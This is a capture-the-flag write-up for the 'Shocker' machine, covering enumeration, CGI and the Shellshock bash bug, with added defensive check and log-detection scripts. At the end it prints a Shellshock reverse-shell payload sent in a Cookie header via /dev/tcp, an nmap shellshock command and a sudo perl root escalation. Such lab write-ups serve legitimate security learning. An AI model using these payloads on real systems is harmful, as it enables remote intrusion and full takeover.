shocker

Shocker (Shellshock)

The Apache Server header and the OpenSSH banner both hint at the Ubuntu release.

Based on the OpenSSH and Apache versions, the host is likely running Ubuntu 16.04. https://packages.ubuntu.com/search?keywords=openssh-server https://packages.ubuntu.com/search?keywords=apache2

Open the site in a browser and view the page source. gobuster does not reveal the sensitive directory because it does not append a trailing slash to wordlist entries; dirb and dirsearch add the slash automatically for directories (at the cost of doubling the number of requests), so dirb finds it on the first run. To get the same result with gobuster, add the -f flag, which simply appends a slash to each wordlist entry.

This reveals a cgi-bin directory.

What is CGI? Let's configure our own CGI on an Apache server: how to enable or disable CGI in Apache, write your own CGI script, and configure CGI.

Learning Apache http server - Executing CGI scripts - YouTube https://www.youtube.com/watch?v=aWWK5tqvuyg

Lecture -19 CGI Scripts - YouTube https://www.youtube.com/watch?v=cP1fN6xf3nI

Common gateway interface|CGI bin - YouTube https://www.youtube.com/watch?v=rRnMLwj5GWk

Common Gateway Interface(CGI) || working process of Common Gateway Interface - YouTube https://www.youtube.com/watch?v=cKckh5pD7VI

Create first cgi script - YouTube https://www.youtube.com/watch?v=XBnGTXDu9gc

How To Enable or Disable CGI Scripts in Apache - YouTube https://www.youtube.com/watch?v=Wr2IVt9X-zY

Run a recursive scan inside this directory looking for common CGI scripts.

CGI defines how information is exchanged between the browser and the server: the web server runs the script as a process, hands it the request through environment variables and stdin, and returns whatever the script writes to stdout.

It is used to create pages dynamically.
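To make the "write your own CGI script" step concrete, here is a minimal CGI script for Apache with the server-side steps as comments. This is an added example, not code from the original notes or from the Shocker machine; it assumes the Ubuntu/Debian Apache defaults (mod_cgi, /usr/lib/cgi-bin, the serve-cgi-bin.conf ScriptAlias) and a hypothetical script name hello.sh.

```shell
#!/bin/sh
# Added example, not from the original notes: a minimal CGI script for Apache,
# with the Apache-side steps as comments. Paths are the Ubuntu/Debian defaults.
#
# Apache side (assumed defaults, run as root):
#   a2enmod cgi                      # enable mod_cgi (cgid under a threaded MPM)
#   # /etc/apache2/conf-enabled/serve-cgi-bin.conf maps /cgi-bin/ to the script dir:
#   #   ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
#   #   <Directory "/usr/lib/cgi-bin">
#   #       Options +ExecCGI
#   #   </Directory>
#   install -m 755 hello.sh /usr/lib/cgi-bin/hello.sh   # hypothetical script name
#   systemctl reload apache2
#
# Apache then runs this file as a child process for every request to
# /cgi-bin/hello.sh, passes the request in environment variables and relays
# whatever the script writes to stdout back to the browser.

# Build the HTTP response: at least one header, a blank line, then the body.
# REQUEST_METHOD, QUERY_STRING, REMOTE_ADDR and the HTTP_* variables are set
# by the server; the defaults only keep the function usable outside Apache.
cgi_response() {
    printf 'Content-Type: text/plain\n\n'
    printf 'method=%s\n' "${REQUEST_METHOD:-GET}"
    printf 'query=%s\n' "${QUERY_STRING:-}"
    printf 'client=%s\n' "${REMOTE_ADDR:-unknown}"
    # Every request header arrives as an HTTP_<NAME> variable. These values are
    # client-controlled text: print them, never pass them to eval or an
    # unquoted command line.
    printf 'user_agent=%s\n' "${HTTP_USER_AGENT:-}"
}

# Apache sets GATEWAY_INTERFACE when it runs a script through mod_cgi, so only
# emit a response in that case; sourcing the file for tests stays silent.
if [ -n "${GATEWAY_INTERFACE:-}" ]; then
    cgi_response
fi
```

The point worth keeping in mind for the rest of these notes is the environment hand-off: every request header becomes an HTTP_* variable in the script's environment before the script even starts, which is why a bash bug in environment handling becomes remotely reachable the moment a bash CGI script is exposed.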

Shellshock is a bug in bash, precisely in old versions of bash: when importing an exported function from the environment, bash kept parsing past the function body and executed whatever followed it. https://www.youtube.com/watch?v=MyldPMn95kk Shellshock Code & the Bash Bug - Computerphile
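Two defender-side checks for the bug described above, as an added example that is not part of the original notes: the standard local test for an unpatched bash, and a first-pass search of an Apache access log for requests carrying the function-definition prefix. The sample log lines are constructed, not a capture from the machine.

```shell
#!/bin/sh
# Added example, not from the original notes: two defender-side checks for
# Shellshock. The sample access log below is constructed.

# 1. Local check. A vulnerable bash imports the exported "function" and keeps
#    executing past its closing brace, so it prints "vulnerable"; a patched
#    bash prints only "test". Exit status: 0 = vulnerable, 1 = patched,
#    2 = bash not installed.
bash_is_vulnerable() {
    command -v bash >/dev/null 2>&1 || return 2
    if env x='() { :;}; echo vulnerable' bash -c 'echo test' 2>/dev/null \
            | grep -q vulnerable; then
        return 0
    fi
    return 1
}

# 2. Log check. mod_cgi exports every request header as an HTTP_* environment
#    variable, so the payload travels in a header such as User-Agent, Cookie or
#    Referer. Apache's combined log records User-Agent and Referer, so the
#    literal "() {" in a log line is a cheap indicator. Cookie is not logged by
#    default, so this check misses that header unless the LogFormat adds it.
#    Reads the log from the file given as $1, or from stdin when called bare.
count_shellshock_requests() {
    grep -cF '() {' "$@"
}

# Constructed sample in Apache combined log format (not a real capture); the
# second line carries the same payload the nmap script in these notes sends.
SAMPLE_LOG='10.10.14.2 - - [01/Jan/2024:10:00:00 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "Mozilla/5.0"
10.10.14.2 - - [01/Jan/2024:10:00:01 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :;}; echo; /bin/ls"
10.10.14.2 - - [01/Jan/2024:10:00:02 +0000] "GET /index.html HTTP/1.1" 200 137 "-" "curl/7.58.0"'

if bash_is_vulnerable; then
    echo "local bash: VULNERABLE, update the bash package"
else
    echo "local bash: patched or not installed"
fi
echo "sample log requests carrying '() {': $(printf '%s\n' "$SAMPLE_LOG" | count_shellshock_requests)"
```

On a patched host the first check prints "patched or not installed" and the log check reports 1 for the sample. The fix on the server side is simply an updated bash package; disabling mod_cgi where it is not needed removes the remote path entirely.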

└─$ gobuster dir -o gobust-cgi.txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.56/cgi-bin/ -x sh,pl,cgi

nmap -p80 --script http-shellshock --script-args uri=/cgi-bin/user.sh,cmd=echo\;/bin/ls 10.10.10.56

Reverse shell: bash one-liner sent as the Cookie header value: () { :;}; echo; /bin/bash -i >& /dev/tcp/ip/port 0>&1

Privilege escalation: sudo /usr/bin/perl -e 'exec("/bin/bash")'
